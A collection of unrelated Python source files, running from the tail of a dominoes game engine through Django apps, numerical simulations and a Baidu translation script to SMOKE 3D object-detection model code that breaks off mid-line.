player, "prompt") response = self.get_response(player) direction = response.strip().upper() if direction not in possible_placements[domino_index][-1]: self.whisper("Invalid direction: " + direction, player, "error") else: return domino, direction except Exception as e: self.whisper("Invalid input, try again", player, "error") else: pulled = self.pack.pull() query_msg = f"Player {player}, you have no valid moves. Send a blank input to pull\n" if self.local: _ = input(query_msg) else: self.whisper(query_msg, player, "prompt") _ = self.get_response(player) if pulled is not None: self.players[player].add_domino(pulled) self.whisper(self.players[player].get_hand_JSON(), player, "hand") else: self.shout("Pack is empty, cannot pull. Skipping turn") return None, None def get_value_on_domino(self, player): """Get the value of a 'Domino' by a player, i.e. the sum, rounded to the nearest 5, of the other players' hand totals.""" total = sum([p.hand_total() for i, p in enumerate(self.players) if i != player]) if total % 5 > 2: total += (5 - (total % 5)) else: total -= total % 5 return total def get_blocked_result(self): """Find the player (if any) that wins points when the game is blocked and return that player and the points they receive.""" totals = [p.hand_total() for p in self.players] print("Totals:", {i: totals[i] for i in range(len(totals))}) if len([t for t in totals if t == min(totals)]) > 1: # Multiple players have lowest count, so nobody gets points return None, 0 else: # Find the player with minimum score and the sum of the other players' hands, rounded to the nearest 5 scorer = totals.index(min(totals)) total = sum(totals) - min(totals) if total % 5 > 2: total += (5 - (total % 5)) else: total -= total % 5 return scorer, total def get_placement_rep(self, domino, direction): rendered_position = self.board.get_rendered_position(domino, direction) return { "face1": domino.head(), "face2": domino.tail(), "face1loc": rendered_position["1"], "face2loc": rendered_position["2"] } def show_scores(self): print("Scores:", self.get_scores()) if not self.local: self.shout(self.get_scores(), "scores") def get_response(self, player : int, print_wait : bool = False) -> str: """Query server for a response.""" # if self._config.verbose: # if print_wait: # print("Waiting for a response from player {}...".format(player)) while True: # if self.is_local_ai(player): # response = self.local_ai_responses[player] # else: # response = self.query_f(player) response = self.query_f(player) if response == "No response": time.sleep(0.01) # time.sleep(self._config.engine_sleep_duration) continue elif response is not None: return response else: assert False def whisper(self, msg, player, tag=None): print(player, ":", msg) if not self.local: self.whisper_f(msg, player, tag) def shout(self, msg, tag=None): print(msg) if not self.local: self.shout_f(msg, tag) if __name__ == "__main__": e = Engine() winner = e.run_game()
from Vintageous import PluginLogger import sublime import os _logger = PluginLogger(__name__) class DotFile(object): def __init__(self, path): self.path = path @staticmethod def from_user(): path = os.path.join(sublime.packages_path(), 'User', '.vintageousrc') return DotFile(path) def run(self): try: with open(self.path, 'r') as f: for line in f: cmd, args = self.parse(line) if cmd: _logger.info('[DotFile] running: {0} {1}'.format(cmd, args)) sublime.active_window().run_command(cmd, args) except FileNotFoundError: pass def parse(self, line): try: _logger.info('[DotFile] parsing line: {0}'.format(line)) if line.startswith((':map ')): line = line[1:] return ('ex_map', {'command_line': line.rstrip()}) if line.startswith((':omap ')): line = line[len(':omap '):] return ('ex_omap', {'cmd': line.rstrip()}) if line.startswith((':vmap ')): line = line[len(':vmap '):] return ('ex_vmap', {'cmd': line.rstrip()}) if line.startswith((':let ')): line = line[1:] return ('ex_let', {'command_line': line.strip()}) except Exception: print('Vintageous: bad config in dotfile: "%s"' % line.rstrip()) _logger.debug('bad config inf dotfile: "%s"', line.rstrip()) return None, None
# Generated by Django 2.0.4 on 2018-06-19 01:41 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Event', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=256)), ('address', models.CharField(max_length=256)), ('city', models.CharField(max_length=256)), ('state', models.CharField(max_length=256)), ('start_date', models.CharField(max_length=256)), ('start_time', models.CharField(max_length=256)), ('end_date', models.CharField(max_length=100)), ('end_time', models.CharField(max_length=256)), ('image', models.ImageField(blank=True, null=True, upload_to='events/')), ('description', models.TextField()), ('code', models.CharField(max_length=256)), ], ), ]
from abc import ABCMeta, abstractmethod from ..helpers import shell_helper class AbstractResource(object): __metaclass__ = ABCMeta AFTER_TASKS_KEY = 'after_tasks' @abstractmethod def __init__(self, properties, global_variables=None): self.properties = properties self.global_variables = global_variables self.name = properties['name'] self.action = properties.get('action', None) self.sudo = properties.get('sudo', None) self.after_tasks = properties.get('after_tasks', None) @property def properties(self): return self.__properties @properties.setter def properties(self, properties): self.__properties = properties @property def name(self): return self.__name @name.setter def name(self, name): self.__name = name @property def action(self): return self.__action @action.setter def action(self, action): self.__action = action @property def sudo(self): return self.__sudo @sudo.setter def sudo(self, sudo): self.__sudo = sudo @property def global_variables(self): return self.__global_variables @global_variables.setter def global_variables(self, global_variables): self.__global_variables = global_variables @property def after_tasks(self): return self.__after_tasks @after_tasks.setter def after_tasks(self, after_tasks): self.__after_tasks = after_tasks @abstractmethod def run(self): pass # check if sudo is enabled def is_sudo_enabled(self): # if self.sudo exists, it overwrites the global variable if self.sudo is True or self.sudo is False: return self.sudo return True if self.global_variables and self.global_variables.is_sudo_enabled() is True else False # run the shell command and print the output if is in debug mode def _run_shell_command(self, command): # determine sudo sudo = 'sudo ' if self.is_sudo_enabled() is True else '' output = shell_helper.ShellHelper.run_command(sudo + command) if self.global_variables and self.global_variables.is_debug_mode() is True: print('* Running: ' + command) if output: print('** Output: ') print(output) # make sure there is no whitespace in the output return output.strip()
import math import numpy as np import statsmodels.api as stat from scipy import stats from matplotlib import pyplot as plt #Question 1 alpha = 0 theta = 0 beta = 0.015 sigma_u = 0.053 sigma_v = 0.044 rho = -0.2 #-0.2 #-0.5 sigma_uv = rho*sigma_u*sigma_v mean = [0, 0] cov = [[sigma_u**2, sigma_uv], [sigma_uv, sigma_v**2]] def reg(Y,X) : X = stat.add_constant(X) return [stat.OLS(Y,X).fit().params, stat.OLS(Y,X).fit().tvalues,stat.OLS(Y,X).fit().pvalues] R=10 avg_beta = np.zeros(R) fivepc_beta = np.zeros(R) nnfivepc_beta = np.zeros(R) Tau=120 for T in range(Tau,Tau*(R+1),Tau): B=250 estAlpha = np.zeros(B) estBeta = np.zeros(B) tAlpha = np.zeros(B) tBeta = np.zeros(B) pAlpha = np.zeros(B) pBeta = np.zeros(B) for i in range(1,B+1): uv=np.random.multivariate_normal(mean, cov, (T+1)) x=np.zeros(T+1) for t in range(1,T+1): x[t]= theta+ rho*x[t-1]+uv[t,1] r = alpha +beta *x[0:T-1]+uv[1:T,0] Z = x[0:T-1] temp = reg(r,Z) estAlpha[i-1] = temp[0][0] estBeta[i-1] = temp[0][1] tAlpha[i-1] = temp[1][0] tBeta[i-1] = temp[1][1] pAlpha[i-1] = temp[2][0] pBeta[i-1] = temp[2][1] tt=int(T/Tau) avg_beta[tt-1] = np.average(estBeta) fivepc_beta[tt-1] = np.percentile(estBeta,5) nnfivepc_beta[tt-1] = np.percentile(estBeta,95) plt.plot(range(Tau,Tau*(R+1),Tau), avg_beta) plt.plot(range(Tau,Tau*(R+1),Tau), fivepc_beta) plt.plot(range(Tau,Tau*(R+1),Tau), nnfivepc_beta)
""" Hash table - example """ import ads_02_00_DB as DB from B_Data_Structures.hashtable import HashTable #ht.HashTable.SIZE = 20 def main(): agenda = HashTable() print(agenda) print() for user in DB.user_to_add: if agenda.insert(user[0], user): print("User was added") else: print("User already has this key registered") agenda.insert(0, "Teste1") agenda.insert(10, "Teste2") agenda.insert(11, "Teste3") print() print(agenda.get(0)) print(agenda.get("oscar@gmail.com")) print(agenda.get("John")) print() print(agenda) if __name__ == "__main__": main() print("Done!!")
########################################################################### ########################################################################### ##################TEST FUNCTION############################################ ########################################################################### ########################################################################### import numpy as np import matplotlib.pyplot as plt import scipy def schwefel(x,arr,brr): x = x.astype(float) return 418.9829*len(x) - np.sum(x*np.sin(np.sqrt(np.abs(x)))) ########################################################################### def schwefel_gradient(x,*args): x = x.astype(float) indices = np.where(x==0) x[indices] = 0.0001 return -(np.sin(np.sqrt(np.abs(x))) + (x*np.cos(np.sqrt(np.abs(x)))*(0.5/np.sqrt(np.abs(x))) * (np.sign(x)))) ########################################################################### def schwefel_hessian(x,*args): x = x.astype(float) e = 1e-4 hessian = np.zeros((len(x),len(x))) for i in range(len(hessian)): x_aux1 = np.array(x) x_aux1[i] = x[i] + e x_aux2 = np.array(x) x_aux2[i] = x[i] - e a = (((schwefel_gradient(x_aux1,args) - schwefel_gradient(x_aux2,args))/(2.0*e))) hessian[i,i] = a[i] return hessian ########################################################################### def non_diff(x): p = np.array([2,2]) if np.linalg.norm(np.subtract(p,x))<1.0: return -1.0 else: return 0.0 ########################################################################### def non_diff_grad(x): return np.zeros((len(x))) ########################################################################### def non_diff_hess(x): return np.zeros((len(x),len(x))) ########################################################################### def plot_schwefel(bounds = [[-500,500],[-500,500]], resolution = 100, points = None, deflation_points = None): import numpy as np import matplotlib.pyplot as plt from matplotlib import cm X = np.linspace(bounds[0][0], bounds[0][1], resolution) Y = np.linspace(bounds[1][0], bounds[1][1], resolution) X, Y = np.meshgrid(X, Y) schwefel = np.empty((X.shape)) gr = np.empty((X.shape)) for i in range(len(X)): for j in range(len(Y)): schwefel[i,j] = self.schwefel(np.array([X[i,j],Y[i,j]])) if deflation_points is not None: gr[i,j] = self.schwefel_gradient(np.array([X[i,j],Y[i,j]]))[0] * self.deflation_function(np.array([[X[i,j],Y[i,j]]]), deflation_points) #gr[i,j] = self.deflation_function(np.array([[X[i,j],Y[i,j]]]), deflation_points) fig = plt.figure(0) a = plt.pcolormesh(X, Y, schwefel, cmap=cm.viridis) plt.colorbar(a) if points is not None: plt.scatter(points[:,0], points[:,1]) if len(deflation_points) != 0: plt.scatter(deflation_points[:,0], deflation_points[:,1]) plt.show() ###########################################################################
from django.contrib import admin from .models import DepartmentInfo, Designation, ExtraInfo, Faculty, Staff, HoldsDesignation # Register your models here. admin.site.register(ExtraInfo) admin.site.register(Staff) admin.site.register(Faculty) admin.site.register(DepartmentInfo) admin.site.register(Designation) admin.site.register(HoldsDesignation)
a = int(input('digite el primer nro ')) b = int(input('digite el segundo nro ')) if a == b: print('SON IGUALES')
#!/usr/bin/python #-*- coding:utf-8 -*- # 百度翻译 API 文档:http://api.fanyi.baidu.com/api/trans/product/apidoc import httplib import md5 import urllib import random import re import json import os import sys kBaiduAppID = 'Please generate from you Baidu developer center' # 百度开发管理后台申请的 AppID kBaiduSecretKey = 'Please generate from you Baidu developer center' # 百度开发管理后台申请的 SecretKey gStringsFileName = '' gStringsKeyList = [] gStringsValueList = [] gAllSupportedLangList = ['auto', 'zh', 'en', 'yue', 'wyw', 'jp', 'kor', 'fra', 'spa', 'th', 'ara', 'ru', 'pt', 'de', 'it', 'el', 'nl', 'pl', 'bul', 'est', 'dan', 'fin', 'cs', 'rom', 'slo', 'swe', 'hu', 'cht', 'vie'] reload(sys) sys.setdefaultencoding( "utf-8" ) def initStringsKeyValueFromFile(fileName): global gStringsFileName global gStringsKeyList global gStringsValueList gStringsFileName = fileName try: f = open(fileName, 'r') lines = f.readlines() except IOError as e: print e else: for line in lines: match = re.search(r'"(?P<key>.*?)" = "(?P<value>.*?)"', line) if match: gStringsKeyList.append(match.group('key')) gStringsValueList.append(match.group('value')) else: # 为了保存注释或空行到新的翻译文件 gStringsKeyList.append(line) gStringsValueList.append('') finally: f.close() def translateToLanguageList(fromLang, toLangs): if fromLang not in gAllSupportedLangList: print fromLang + 'is not supported' return for toLang in toLangs: if toLang not in gAllSupportedLangList: print toLang + 'is not supported' break translateToLang(fromLang, toLang) def translateToLang(fromLang, toLang): httpClient = None myurl = '/api/trans/vip/translate' httpClient = httplib.HTTPConnection('api.fanyi.baidu.com') extension = os.path.splitext(gStringsFileName)[1] toFileName = gStringsFileName.replace(extension, '_' + toLang + extension) toFile = open(toFileName, 'w'); print 'Translating ' + toLang + ' to fileName: ' + toFileName for index,val in enumerate(gStringsValueList): q = val if q: salt = random.randint(32768, 65536) sign = kBaiduAppID + q + str(salt) + kBaiduSecretKey m1 = md5.new() m1.update(sign) sign = m1.hexdigest() myurl = myurl + '?appid=' + kBaiduAppID + '&q=' + urllib.quote(q) + '&from=' + fromLang + '&to=' + toLang + '&salt=' + str(salt) + '&sign=' + sign try: httpClient.request('GET', myurl) #response是HTTPResponse对象 response = httpClient.getresponse() jsonData = json.loads(response.read()) dst = jsonData['trans_result'][0]['dst'] result = '"' + gStringsKeyList[index] + '" = "' + dst + '";\n' toFile.write(result) except Exception, e: print e else: # 不需要翻译,直接保存原来的 Key toFile.write(gStringsKeyList[index]) if httpClient: httpClient.close() if toFile: toFile.close() print 'Finished translating to ' + toLang fileName = raw_input('Enter a fileName: ') initStringsKeyValueFromFile(fileName) print 'Supports languages:' print gAllSupportedLangList fromLang = raw_input('Enter from language: ') toLangs = raw_input('Enter to language list, split by space: ') print 'Start' translateToLanguageList(fromLang, toLangs.split()) print 'All done!'
from core.framework.module import FridaModule class Module(FridaModule): meta = { 'name': 'Title', 'author': '@AUTHOR (@MWRLabs)', 'description': 'Description', 'options': ( ), } # ================================================================================================================== # UTILS # ================================================================================================================== # ================================================================================================================== # RUN # ================================================================================================================== def module_run(self): pass
from django.urls import path from .views import teacher as teacher_view from .views import student as student_view from .views import notification as notification_view from .views import common as common_view from .views import statistics as statistics_view urlpatterns = [ path('', common_view.index, name='index'), path('find-task/<int:task_id>/<str:login>/', student_view.find_task_detail, name='find_task_detail'), path('task/<int:assignment_id>/<str:login>/', student_view.task_detail, name='task_detail'), path('task/<int:assignment_id>/<str:login>/<int:submit_num>/', student_view.task_detail, name='task_detail'), path('task/<int:assignment_id>/<str:login>/<int:submit_a>-<int:submit_b>.diff', student_view.submit_diff, name='submits_diff'), path('task/<int:assignment_id>/<str:login>/<int:submit_num>/download', student_view.submit_download, name='submit_download'), path('task/<int:assignment_id>/<str:login>/<int:submit_num>/comments', student_view.submit_comments, name='submit_comments'), path('task/<int:assignment_id>/<str:login>/<int:submit_num>/result', student_view.upload_results), path('task/<path:task_name>/asset/<path:path>', student_view.task_asset, name='task_asset'), path('task/<path:task_name>/tests/<str:test_name>/<str:file>', student_view.raw_test_content, name='raw_test_content'), path('task/<path:task_name>.tar.gz', student_view.tar_test_data, name='tar_test_data'), path('result/<int:submit_id>/<str:test_name>/<str:result_type>/<str:file>', student_view.raw_result_content, name='raw_result_content'), path('submit/<int:submit_id>/source/<path:path>', student_view.submit_source, name='submit_source'), path('submit/<int:submit_id>/pipeline', student_view.pipeline_status), # notifications path('notification/all', notification_view.all_notifications), path('notification/mark_as_read', notification_view.mark_as_read), path('notification/mark_as_read/<int:notification_id>', notification_view.mark_as_read), # teacher path('teacher/task/<int:task_id>', teacher_view.teacher_task, name='teacher_task'), path('teacher/task/<int:task_id>.tar', student_view.teacher_task_tar, name='teacher_task_tar'), path('teacher/task/<int:task_id>/moss', teacher_view.teacher_task_moss_check, name='teacher_task_moss_check'), path('submits', teacher_view.submits, name='submits'), path('submits/<str:student_username>', teacher_view.submits, name='submits'), path('statistics/task/<int:task_id>', statistics_view.for_task, name='task_stats'), path('statistics/assignment/<int:assignment_id>', statistics_view.for_assignment, name='assignment'), path('assignment/download/<int:assignment_id>', teacher_view.download_assignment_submits, name='download_assignment_submits'), path('assignment/download/<int:assignment_id>/csv', teacher_view.download_csv_per_task, name='download_csv_per_task'), path('assignment/show/<int:assignment_id>', teacher_view.show_assignment_submits, name='show_assignment_submits'), path('task/show/<int:task_id>', teacher_view.show_task_submits, name='show_task_submits'), path('submit/<int:submit_id>/points', teacher_view.submit_assign_points, name='submit_assign_points'), path('class/download/<int:class_id>/csv', teacher_view.download_csv_per_class, name='download_csv_per_class'), path('tasks', teacher_view.all_tasks, name='tasks'), path('tasks/<str:subject__abbr>', teacher_view.all_tasks, name='tasks'), path('reevaluate/<int:submit_id>', teacher_view.reevaluate, name='reevaluate'), path('import', teacher_view.bulk_import), path('api_token', common_view.api_token), ]
import torch from torch.nn import functional as F import torch.nn as nn import math from ..model_utils.weight_process import _fill_fc_weights, _HEAD_NORM_SPECS from ..model_utils.center_based_utils import sigmoid_hm, select_point_of_interest, nms_hm, select_topk def get_channel_spec(reg_channels, name): if name == "dim": s = sum(reg_channels[:2]) e = sum(reg_channels[:3]) elif name == "ori": s = sum(reg_channels[:3]) e = sum(reg_channels) return slice(s, e, 1) class SMOKEPredictor(nn.Module): def __init__(self, heads, in_channels): super(SMOKEPredictor, self).__init__() classes = len(heads["class"]) regression = heads["reg"] regression_channels = heads["reg_c"] head_conv = 256 norm_func = _HEAD_NORM_SPECS[heads["norm"]] assert sum(regression_channels) == regression, \ "the sum of {} must be equal to regression channel of {}".format( regression, regression_channels ) self.dim_channel = get_channel_spec(regression_channels, name="dim") self.ori_channel = get_channel_spec(regression_channels, name="ori") self.class_head = nn.Sequential( nn.Conv2d(in_channels, head_conv, kernel_size=3, padding=1, bias=True), norm_func(head_conv), nn.ReLU(inplace=True), nn.Conv2d(head_conv, classes, kernel_size=1, padding=1 // 2, bias=True) ) # todo: what is datafill here self.class_head[-1].bias.data.fill_(-2.19) self.regression_head = nn.Sequential( nn.Conv2d(in_channels, head_conv, kernel_size=3, padding=1, bias=True), norm_func(head_conv), nn.ReLU(inplace=True), nn.Conv2d(head_conv, regression, kernel_size=1, padding=1 // 2, bias=True) ) _fill_fc_weights(self.regression_head) def forward(self, features): head_class = self.class_head(features) head_regression = self.regression_head(features) head_class = sigmoid_hm(head_class) # (N, C, H, W) offset_dims = head_regression[:, self.dim_channel, ...].clone() head_regression[:, self.dim_channel, ...] = torch.sigmoid(offset_dims) - 0.5 vector_ori = head_regression[:, self.ori_channel, ...].clone() head_regression[:, self.ori_channel, ...] = F.normalize(vector_ori) return [head_class, head_regression] class SMOKECoder(): def __init__(self, depth_ref, dim_ref, device="cuda"): self.depth_ref = torch.as_tensor(depth_ref).to(device=device) self.dim_ref = torch.as_tensor(dim_ref).to(device=device) def encode_box2d(self, K, rotys, dims, locs, img_size): device = rotys.device K = K.to(device=device) img_size = img_size.flatten() box3d = self.encode_box3d(rotys, dims, locs) N = box3d.shape[0] batch_size = rotys.shape[0] K = K.type(box3d.type()) K = K.repeat(N//batch_size, 1, 1).view(-1, 3, 3) box3d_image = torch.matmul(K, box3d) box3d_image = box3d_image[:, :2, :] / box3d_image[:, 2, :].view( box3d.shape[0], 1, box3d.shape[2] ) xmins, _ = box3d_image[:, 0, :].min(dim=1) xmaxs, _ = box3d_image[:, 0, :].max(dim=1) ymins, _ = box3d_image[:, 1, :].min(dim=1) ymaxs, _ = box3d_image[:, 1, :].max(dim=1) xmins = xmins.clamp(0, img_size[0]) xmaxs = xmaxs.clamp(0, img_size[0]) ymins = ymins.clamp(0, img_size[1]) ymaxs = ymaxs.clamp(0, img_size[1]) bboxfrom3d = torch.cat((xmins.unsqueeze(1), ymins.unsqueeze(1), xmaxs.unsqueeze(1), ymaxs.unsqueeze(1)), dim=1) return bboxfrom3d @staticmethod def rad_to_matrix(rotys, N): device = rotys.device cos, sin = rotys.cos(), rotys.sin() i_temp = torch.tensor([[1, 0, 1], [0, 1, 0], [-1, 0, 1]]).to(dtype=torch.float32, device=device) ry = i_temp.repeat(N, 1).view(N, -1, 3) ry[:, 0, 0] *= cos.squeeze() ry[:, 0, 2] *= sin.squeeze() ry[:, 2, 0] *= sin.squeeze() ry[:, 2, 2] *= cos.squeeze() return ry def encode_box3d(self, rotys, dims, locs): ''' construct 3d bounding box for each object. Args: rotys: rotation in shape N dims: dimensions of objects locs: locations of objects Returns: ''' rotys = rotys.view(-1, 1) dims = dims.view(-1, 3) locs = locs.view(-1, 3) device = rotys.device N = rotys.shape[0] ry = self.rad_to_matrix(rotys, N) dims = dims.view(-1, 1).repeat(1, 8) dims[::3, :4], dims[2::3, :4] = 0.5 * dims[::3, :4], 0.5 * dims[2::3, :4] dims[::3, 4:], dims[2::3, 4:] = -0.5 * dims[::3, 4:], -0.5 * dims[2::3, 4:] dims[1::3, :4], dims[1::3, 4:] = 0., -dims[1::3, 4:] index = torch.tensor([[4, 0, 1, 2, 3, 5, 6, 7], [4, 5, 0, 1, 6, 7, 2, 3], [4, 5, 6, 0, 1, 2, 3, 7]]).repeat(N, 1).to(device=device) box_3d_object = torch.gather(dims, 1, index) box_3d = torch.matmul(ry, box_3d_object.view(N, 3, -1)) box_3d += locs.unsqueeze(-1).repeat(1, 1, 8) return box_3d def decode_depth(self, depths_offset): ''' Transform depth offset to depth ''' device = depths_offset.device self.depth_ref[0] = self.depth_ref[0].to(device=device) self.depth_ref[1] = self.depth_ref[1].to(device=device) depth = depths_offset * self.depth_ref[1] + self.depth_ref[0] return depth def decode_location(self, points, points_offset, depths, Ks, trans_mats): ''' retrieve objects location in camera coordinate based on projected points Args: points: projected points on feature map in (x, y) points_offset: project points offset in (delata_x, delta_y) depths: object depth z Ks: camera intrinsic matrix, shape = [N, 3, 3] trans_mats: transformation matrix from image to feature map, shape = [N, 3, 3] Returns: locations: objects location, shape = [N, 3] ''' # batch_size = trans_mats.shape[0] # sub = torch.zeros(batch_size, 1, 3).float().to(trans_mats.device) # sub[..., 2] = 1 # if (trans_mats.shape[1] == 2): # trans_mats = torch.cat((trans_mats, sub), 1) device = points.device tensor_type = depths.type() points = points.type(tensor_type) points_offset = points_offset.type(tensor_type) depths = depths.type(tensor_type) Ks = Ks.type(tensor_type) trans_mats = trans_mats.type(tensor_type) points = points.to(device=device) points_offset = points_offset.to(device=device) depths = depths.to(device=device) Ks = Ks.to(device=device) trans_mats = trans_mats.to(device=device) # number of points N = points_offset.shape[1] # batch size N_batch = Ks.shape[0] Ks_inv = Ks.inverse() proj_points = points.type(tensor_type) + points_offset.type(tensor_type) # transform project points in homogeneous form. proj_points_extend = torch.cat( (proj_points, torch.ones(N_batch, N, 1).type(tensor_type).to(device=device)), dim=2) # transform project points back on image proj_points_extend = proj_points_extend.type_as(trans_mats) trans_mats = trans_mats.repeat(N, 1, 1) proj_points_extend = proj_points_extend.view(-1, 3, 1) proj_points_img = torch.matmul(trans_mats, proj_points_extend) # with depth proj_points_img = proj_points_img * depths.view(-1, 1, 1) # transform image coordinates back to object locations Ks_inv = Ks_inv.type_as(proj_points_img) Ks_inv = Ks_inv.repeat(N, 1, 1) locations = torch.matmul(Ks_inv, proj_points_img) return locations.squeeze(2) def decode_dimension(self, cls_id, dims_offset): ''' retrieve object dimensions Args: cls_id: each object id dims_offset: dimension offsets, shape = (N, 3) Returns: ''' cls_id = cls_id.flatten().long() dims_select = self.dim_ref[cls_id, :] dims_offset = dims_offset.view(-1, 3) dims_select = dims_select.to(device=dims_offset.device) dimensions = dims_offset.exp() * dims_select return dimensions def decode_orientation(self, vector_ori, locations, flip_mask=None): ''' retrieve object orientation Args: vector_ori: local orientation in [sin, cos] format locations: object location Returns: for training we only need roty for testing we need both alpha and roty ''' device = locations.device tensor_type = locations.type() vector_ori = vector_ori.type(tensor_type) vector_ori = vector_ori.to(device=device) locations = locations.view(-1, 3) vector_ori = vector_ori.view(-1, 2) rays = torch.atan(locations[:, 0] / (locations[:, 2] + 1e-7)) alphas = torch.atan(vector_ori[:, 0] / (vector_ori[:, 1] + 1e-7)) # get cosine value positive and negtive index. cos_pos_idx = (vector_ori[:, 1] >= 0).nonzero() cos_neg_idx = (vector_ori[:, 1] < 0).nonzero() alphas[cos_pos_idx] -= math.pi / 2 alphas[cos_neg_idx] += math.pi / 2 # retrieve object rotation y angle. rotys = alphas + rays # in training time, it does not matter if angle lies in [-PI, PI] # it matters at inference time? todo: does it really matter if it exceeds. larger_idx = (rotys > math.pi).nonzero() small_idx = (rotys < -math.pi).nonzero() if len(larger_idx) != 0: rotys[larger_idx] -= 2 * math.pi if len(small_idx) != 0: rotys[small_idx] += 2 * math.pi if flip_mask is not None: flip_mask = flip_mask.view(-1, 1) fm = flip_mask.flatten() rotys_flip = fm.float() * rotys rotys_flip_pos_idx = rotys_flip > 0 rotys_flip_neg_idx = rotys_flip < 0 rotys_flip[rotys_flip_pos_idx] -= math.pi rotys_flip[rotys_flip_neg_idx] += math.pi rotys_all = fm.float() * rotys_flip + (1 - fm.float()) * rotys return rotys_all, alphas else: return rotys, alphas class SMOKELossComputation(): def __init__(self, smoke_coder, cls_loss, reg_loss, loss_weight, max_objs): self.smoke_coder = smoke_coder self.cls_loss = cls_loss self.reg_loss = reg_loss self.loss_weight = loss_weight self.max_objs = max_objs def prepare_targets(self, targets): heatmaps = targets["hm"] regression = targets["reg"] cls_ids = targets["cls_ids"] proj_points = targets["proj_points"] dimensions = targets["dimensions"] locations = targets["locations"] rotys = targets["rotys"] trans_mat = targets["trans_mat"] K = targets["K"] reg_mask = targets["reg_mask"] flip_mask = targets["flip_mask"] return heatmaps, regression, dict(cls_ids=cls_ids, proj_points=proj_points, dimensions=dimensions, locations=locations, rotys=rotys, trans_mat=trans_mat, K=K, reg_mask=reg_mask, flip_mask=flip_mask) def prepare_predictions(self, targets_variables, pred_regression): batch, channel = pred_regression.shape[0], pred_regression.shape[1] targets_proj_points = targets_variables["proj_points"] # obtain prediction from points of interests pred_regression_pois = select_point_of_interest( batch, targets_proj_points, pred_regression ) # pred_regression_pois = pred_regression_pois.view(-1, channel) # FIXME: fix hard code here pred_depths_offset = pred_regression_pois[..., 0:1] pred_proj_offsets = pred_regression_pois[..., 1:3] pred_dimensions_offsets = pred_regression_pois[..., 3:6] pred_orientation = pred_regression_pois[..., 6:] pred_depths = self.smoke_coder.decode_depth(pred_depths_offset) pred_locations = self.smoke_coder.decode_location( targets_proj_points, pred_proj_offsets, pred_depths, targets_variables["K"], targets_variables["trans_mat"] ) pred_dimensions = self.smoke_coder.decode_dimension( targets_variables["cls_ids"], pred_dimensions_offsets, ) # we need to change center location to bottom location pred_locations[:, 1] += pred_dimensions[:, 1] / 2 pred_rotys, pred_alphas = self.smoke_coder.decode_orientation( pred_orientation, targets_variables["locations"], targets_variables["flip_mask"] ) pred_rotys = pred_rotys.view(batch, -1, 1) pred_alphas = pred_alphas.view(batch, -1, 1) if self.reg_loss == "DisL1": pred_box3d_rotys = self.smoke_coder.encode_box3d( pred_rotys, targets_variables["dimensions"], targets_variables["locations"] ) pred_box3d_dims = self.smoke_coder.encode_box3d( targets_variables["rotys"], pred_dimensions, targets_variables["locations"] ) pred_box3d_locs = self.smoke_coder.encode_box3d( targets_variables["rotys"], targets_variables["dimensions"], pred_locations ) return dict(ori=pred_box3d_rotys, dim=pred_box3d_dims, loc=pred_box3d_locs, ) elif self.reg_loss == "L1": pred_box_3d = self.smoke_coder.encode_box3d( pred_rotys, pred_dimensions, pred_locations ) return pred_box_3d def __call__(self, predictions, targets): pred_heatmap, pred_regression = predictions[0], predictions[1] targets_heatmap, targets_regression, targets_variables \ = self.prepare_targets(targets) predict_boxes3d = self.prepare_predictions(targets_variables, pred_regression) hm_loss = self.cls_loss(pred_heatmap, targets_heatmap) * self.loss_weight[0] targets_regression = targets_regression.view( -1, targets_regression.shape[2], targets_regression.shape[3] ) reg_mask = targets_variables["reg_mask"].flatten() reg_mask = reg_mask.view(-1, 1, 1) reg_mask = reg_mask.expand_as(targets_regression) if self.reg_loss == "DisL1": reg_loss_ori = F.l1_loss( predict_boxes3d["ori"] * reg_mask, targets_regression * reg_mask, reduction="sum") / (self.loss_weight[1] * self.max_objs) reg_loss_dim = F.l1_loss( predict_boxes3d["dim"] * reg_mask, targets_regression * reg_mask, reduction="sum") / (self.loss_weight[1] * self.max_objs) reg_loss_loc = F.l1_loss( predict_boxes3d["loc"] * reg_mask, targets_regression * reg_mask, reduction="sum") / (self.loss_weight[1] * self.max_objs) loss_all = hm_loss + reg_loss_ori + reg_loss_dim + reg_loss_loc loss_dict = {} loss_dict["hm"] = hm_loss.item() loss_dict["ori"] = reg_loss_ori.item() loss_dict["dim"] = reg_loss_dim.item() loss_dict["loc"] = reg_loss_loc.item() return loss_all, loss_dict, {} class PostProcessor(nn.Module): def __init__(self, smoker_coder, reg_head, det_threshold, max_detection, pred_2d): super(PostProcessor, self).__init__() self.smoke_coder = smoker_coder self.reg_head = reg_head self.det_threshold = det_threshold self.max_detection = max_detection self.pred_2d = pred_2d def prepare_targets(self, targets): dict_ret = {} dict_ret["trans_mat"] = targets["trans_mat"].view(1,3,3) dict_ret["K"] = targets["K"].view(1,3,3) dict_ret["size"] = targets["size"].view(1,2) return None, None, dict_ret def forward(self, predictions, targets): pred_heatmap, pred_regression = predictions[0], predictions[1] batch, channel = pred_regression.shape[0], pred_regression.shape[1] _, _, target_varibales = self.prepare_targets(targets) heatmap = nms_hm(pred_heatmap) scores, indexs, clses, ys, xs = select_topk( heatmap, K=self.max_detection, ) pred_regression_pois = select_point_of_interest( batch, indexs, pred_regression ) pred_proj_points = torch.cat([xs.view(batch, -1, 1), ys.view(batch, -1, 1)], dim=2) # FIXME: fix hard code here # pred_regression_pois = pred_regression_pois.view(-1, channel) pred_depths_offset = pred_regression_pois[..., 0:1] pred_proj_offsets = pred_regression_pois[..., 1:3] pred_dimensions_offsets = pred_regression_pois[..., 3:6] pred_orientation = pred_regression_pois[..., 6:] pred_depths = self.smoke_coder.decode_depth(pred_depths_offset) pred_locations = self.smoke_coder.decode_location( pred_proj_points, pred_proj_offsets, pred_depths, target_varibales["K"], target_varibales["trans_mat"] ) pred_dimensions = self.smoke_coder.decode_dimension( clses, pred_dimensions_offsets ) # we need to change center location to bottom location pred_locations[:, 1] += pred_dimensions[:, 1] / 2 pred_rotys, pred_alphas = self.smoke_coder.decode_orientation( pred_orientation, pred_locations ) if self.pred_2d: box2d = self.smoke_coder.encode_box2d( target_varibales["K"], pred_rotys, pred_dimensions, pred_locations, target_varibales["size"] ) else: box2d = torch.tensor([0, 0, 0, 0]) # change variables to the same dimension clses = clses.view(batch, self.max_detection, 1) pred_alphas = pred_alphas.view(batch, self.max_detection, 1) box2d = box2d.view(batch, self.max_detection, 4) pred_rotys = pred_rotys.view(batch, self.max_detection, 1) scores = scores.view(batch, 